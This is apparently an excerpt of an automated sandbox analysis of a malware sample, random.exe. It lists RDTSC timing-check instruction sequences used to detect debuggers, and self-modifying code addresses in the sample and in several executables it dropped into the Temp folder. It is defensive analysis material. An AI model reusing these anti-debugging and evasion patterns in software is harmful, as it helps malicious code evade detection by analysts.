Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0B0F second address: 4CC0B2A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0B2A second address: 4CC0B42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3C150B7574h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0B42 second address: 4CC0B46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0B46 second address: 4CC0B60 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F3C8731CDCEh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F3C150B756Ah 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0B60 second address: 4CC0BAE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov edx, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F3C153246E6h 0x00000011 xchg eax, ebx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F3C153246DEh 0x00000019 sub cx, E4C8h 0x0000001e jmp 00007F3C153246DBh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 push ecx 0x00000027 pop ebx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0BAE second address: 4CC0C05 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7572h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b pushad 0x0000000c mov dx, CDD4h 0x00000010 popad 0x00000011 xchg eax, ebx 0x00000012 jmp 00007F3C150B756Fh 0x00000017 xchg eax, ebx 0x00000018 jmp 00007F3C150B7576h 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F3C150B756Dh 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0C05 second address: 4CC0C09 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0C09 second address: 4CC0C0F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0C0F second address: 4CC0C15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0C15 second address: 4CC0C85 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F3C150B7570h 0x00000010 or eax, 49950E48h 0x00000016 jmp 00007F3C150B756Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F3C150B7578h 0x00000022 add al, FFFFFFA8h 0x00000025 jmp 00007F3C150B756Bh 0x0000002a popfd 0x0000002b popad 0x0000002c push dword ptr [ebp+14h] 0x0000002f push eax 0x00000030 push edx 0x00000031 jmp 00007F3C150B7575h 0x00000036 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0C85 second address: 4CC0C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3C153246DCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0C95 second address: 4CC0CA6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+10h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0CA6 second address: 4CC0CAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CC0CAA second address: 4CC0CC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7574h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CE000D second address: 4CE0062 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007F3C153246E3h 0x00000012 pushfd 0x00000013 jmp 00007F3C153246E8h 0x00000018 adc ah, 00000058h 0x0000001b jmp 00007F3C153246DBh 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CE0062 second address: 4CE00CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3C150B756Fh 0x00000008 pop ecx 0x00000009 pushfd 0x0000000a jmp 00007F3C150B7579h 0x0000000f sub cx, 12A6h 0x00000014 jmp 00007F3C150B7571h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F3C150B756Ah 0x00000027 sub al, 00000048h 0x0000002a jmp 00007F3C150B756Bh 0x0000002f popfd 0x00000030 push ecx 0x00000031 pop edi 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CE00CA second address: 4CE0109 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, 52B6h 0x00000007 pushfd 0x00000008 jmp 00007F3C153246E7h 0x0000000d jmp 00007F3C153246E3h 0x00000012 popfd 0x00000013 popad 0x00000014 pop edx 0x00000015 pop eax 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a mov ah, dh 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0CF6 second address: 4CD0CFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0CFA second address: 4CD0D00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0D00 second address: 4CD0D62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop ecx 0x00000005 call 00007F3C150B756Bh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov ah, dl 0x00000012 pushad 0x00000013 call 00007F3C150B756Ch 0x00000018 pop ecx 0x00000019 pushfd 0x0000001a jmp 00007F3C150B756Bh 0x0000001f sub ah, FFFFFFBEh 0x00000022 jmp 00007F3C150B7579h 0x00000027 popfd 0x00000028 popad 0x00000029 popad 0x0000002a mov ebp, esp 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F3C150B756Dh 0x00000033 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CD0D62 second address: 4CD0D93 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3C153246E7h 0x00000009 jmp 00007F3C153246E3h 0x0000000e popfd 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D507D3 second address: 4D507E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D507E2 second address: 4D507E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D507E8 second address: 4D50826 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F3C150B7576h 0x00000009 sub esi, 203D11D8h 0x0000000f jmp 00007F3C150B756Bh 0x00000014 popfd 0x00000015 movzx esi, di 0x00000018 popad 0x00000019 pop edx 0x0000001a pop eax 0x0000001b mov ebp, esp 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov cx, 2023h 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D4097B second address: 4D40981 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D40981 second address: 4D40985 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D40985 second address: 4D409C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a mov dl, C1h 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007F3C153246DDh 0x00000013 adc esi, 601198A6h 0x00000019 jmp 00007F3C153246E1h 0x0000001e popfd 0x0000001f popad 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 pushad 0x00000027 popad 0x00000028 mov ax, bx 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D409C5 second address: 4D409DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F3C150B7571h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D409DA second address: 4D409E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D409E9 second address: 4D409ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D409ED second address: 4D40A03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D4078F second address: 4D40795 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D40795 second address: 4D40799 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D40799 second address: 4D4079D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D4079D second address: 4D407AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push esi 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D407AC second address: 4D407B0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D407B0 second address: 4D407B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D407B6 second address: 4D4081C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, bx 0x00000006 pushfd 0x00000007 jmp 00007F3C150B7573h 0x0000000c and ah, FFFFFFFEh 0x0000000f jmp 00007F3C150B7579h 0x00000014 popfd 0x00000015 popad 0x00000016 pop edx 0x00000017 pop eax 0x00000018 mov dword ptr [esp], ebp 0x0000001b jmp 00007F3C150B756Eh 0x00000020 mov ebp, esp 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007F3C150B7577h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D4081C second address: 4D40822 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D40822 second address: 4D40826 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D40BCE second address: 4D40C11 instructions: 0x00000000 rdtsc 0x00000002 mov si, 2F2Bh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushfd 0x00000009 jmp 00007F3C153246E0h 0x0000000e sub si, BAB8h 0x00000013 jmp 00007F3C153246DBh 0x00000018 popfd 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F3C153246E5h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D40C11 second address: 4D40C17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D40C17 second address: 4D40C1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D40C1B second address: 4D40C30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop edi 0x0000000f mov esi, 6DBEE063h 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D40C30 second address: 4D40CB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F3C153246DFh 0x00000008 call 00007F3C153246E8h 0x0000000d pop eax 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push dword ptr [ebp+0Ch] 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007F3C153246E7h 0x0000001b xor si, 3C9Eh 0x00000020 jmp 00007F3C153246E9h 0x00000025 popfd 0x00000026 mov ebx, eax 0x00000028 popad 0x00000029 push dword ptr [ebp+08h] 0x0000002c pushad 0x0000002d movzx ecx, bx 0x00000030 popad 0x00000031 call 00007F3C153246D9h 0x00000036 pushad 0x00000037 movzx esi, bx 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D40CB4 second address: 4D40CD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov dl, FDh 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c call 00007F3C150B7573h 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4D40CD4 second address: 4D40D6C instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F3C153246E9h 0x00000008 sbb ah, FFFFFF96h 0x0000000b jmp 00007F3C153246E1h 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 mov ax, 4207h 0x00000017 popad 0x00000018 mov eax, dword ptr [esp+04h] 0x0000001c jmp 00007F3C153246DDh 0x00000021 mov eax, dword ptr [eax] 0x00000023 jmp 00007F3C153246E1h 0x00000028 mov dword ptr [esp+04h], eax 0x0000002c push eax 0x0000002d push edx 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F3C153246DAh 0x00000035 and cx, 8818h 0x0000003a jmp 00007F3C153246DBh 0x0000003f popfd 0x00000040 jmp 00007F3C153246E8h 0x00000045 popad 0x00000046 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF0808 second address: 4CF0873 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F3C150B7576h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 mov edi, esi 0x00000016 pushfd 0x00000017 jmp 00007F3C150B756Ah 0x0000001c sub ax, 4C88h 0x00000021 jmp 00007F3C150B756Bh 0x00000026 popfd 0x00000027 popad 0x00000028 push FFFFFFFEh 0x0000002a jmp 00007F3C150B7576h 0x0000002f call 00007F3C150B7569h 0x00000034 push eax 0x00000035 push edx 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF0873 second address: 4CF0877 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF0877 second address: 4CF0894 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B7579h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF0894 second address: 4CF08BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F3C153246E7h 0x00000008 pop esi 0x00000009 mov dh, A7h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 movsx edx, cx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF08BC second address: 4CF08DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov eax, 08F027B5h 0x00000009 popad 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F3C150B756Dh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF08DC second address: 4CF08F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF08F1 second address: 4CF08F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF08F7 second address: 4CF08FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF08FB second address: 4CF0946 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov ebx, 4344A926h 0x00000012 pushfd 0x00000013 jmp 00007F3C150B7577h 0x00000018 add ecx, 38A3DBAEh 0x0000001e jmp 00007F3C150B7579h 0x00000023 popfd 0x00000024 popad 0x00000025 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF0946 second address: 4CF094C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF094C second address: 4CF0950 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF0950 second address: 4CF0973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C153246E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random.exe	RDTSC instruction interceptor: First address: 4CF0973 second address: 4CF0985 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F3C150B756Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 6BEA2E instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 6BEAB0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\random.exe	Special instruction interceptor: First address: 883E05 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B2EA2E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: B2EAB0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Special instruction interceptor: First address: CF3E05 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Special instruction interceptor: First address: 39EC18 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Special instruction interceptor: First address: 54AC7C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Special instruction interceptor: First address: 56FD84 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Special instruction interceptor: First address: 55A737 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072542001\dfd80aba08.exe	Special instruction interceptor: First address: 5D170D instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Special instruction interceptor: First address: 124FB31 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Special instruction interceptor: First address: 124FC81 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Special instruction interceptor: First address: 13EE2BD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Special instruction interceptor: First address: 141CB37 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072543001\ae70ca0159.exe	Special instruction interceptor: First address: 148048A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Special instruction interceptor: First address: 473955 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Special instruction interceptor: First address: 6418B4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Special instruction interceptor: First address: 61FD6B instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072548001\5a4a47dccd.exe	Special instruction interceptor: First address: 6A3B4C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Special instruction interceptor: First address: C9193E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Special instruction interceptor: First address: E3825C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Special instruction interceptor: First address: E44A58 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Special instruction interceptor: First address: 35FB31 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Special instruction interceptor: First address: 35FC81 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Special instruction interceptor: First address: 4FE2BD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Special instruction interceptor: First address: 52CB37 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\PAL947G2R107U02V5ZPL.exe	Special instruction interceptor: First address: 59048A instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072549001\loqVSeJ.exe	Special instruction interceptor: First address: ECB5AD instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Special instruction interceptor: First address: BCEA2E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Special instruction interceptor: First address: BCEAB0 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\FQZHGI4TELUEK712J739LWFDT7.exe	Special instruction interceptor: First address: D93E05 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Special instruction interceptor: First address: 4259F4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Special instruction interceptor: First address: 4234B6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Special instruction interceptor: First address: 5F1AB6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Special instruction interceptor: First address: 5D2595 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072551001\Bjkm5hE.exe	Special instruction interceptor: First address: 65BEA6 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Special instruction interceptor: First address: 19DA92 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Special instruction interceptor: First address: 34374E instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Special instruction interceptor: First address: 36ABFA instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Special instruction interceptor: First address: 3CEB9C instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072552001\7fOMOTQ.exe	Special instruction interceptor: First address: 341E54 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Special instruction interceptor: First address: 473CF1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\1072555001\Fe36XBk.exe	Special instruction interceptor: First address: 473D86 instructions caused by: Self-modifying code
